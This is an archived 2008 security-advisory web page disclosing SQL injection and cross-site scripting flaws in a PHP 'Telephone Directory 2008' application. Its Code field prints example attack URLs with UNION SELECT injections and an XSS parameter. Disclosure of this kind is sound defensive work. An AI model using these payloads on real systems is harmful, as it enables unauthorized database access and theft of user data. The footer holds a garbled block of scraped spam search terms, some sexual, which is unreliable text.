about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Telephone Directory 2008 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities


Title Telephone Directory 2008 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Published 2008-06-09-12:00AM
Updated 2008-06-09-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  CWH Underground
Vulnerable  Rittwick Banerjee Telephone Directory 2008 Stable
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim to follow a malicious URI.The following example URIs are available:http://www.example.com/[path]/edit1.php?action=confirm_data&code=1'/**/UNION/**/SELECT/**/1,name,3,4,5,6,7,8,9,10,11,12/**/FROM/**/dept/**/WHERE/**/ID='HOUS001http://www.example.com/[path]/view_more.php?id=1'/**/UNION/**/SELECT/**/1,2,3,name,5/**/FROM/**/dept/**/WHERE/**/ID='INTX007812http://www.example.com/[path]/edit1.php?action=<XSS>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 06 Sep 2008 16:31:27 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Nude bolly Trisha se www.wapric griles-hav schoolesex www Tamil Www.Dasi b goahead all cartoo Www.iyotub rnescape a schoolesex Trisha hot Server: Ap sexey pict Actressthr search.php search.php 200 /compo Cerita+dew sez video hotmoms t419t k5su www.sex oc QMail WWW.Bluefl XXXXVIDEO /search/ex Fedora Cor 1,1 RC3 Kerala sex www.google Www.family Xxx video vb2 skin c proftd 1.2 FREE PREET music on Www.family ima cd key nfs 2.18 Bretny+spe Www.kamsut rsgallery news for c Desi baba asian sex. a...html/p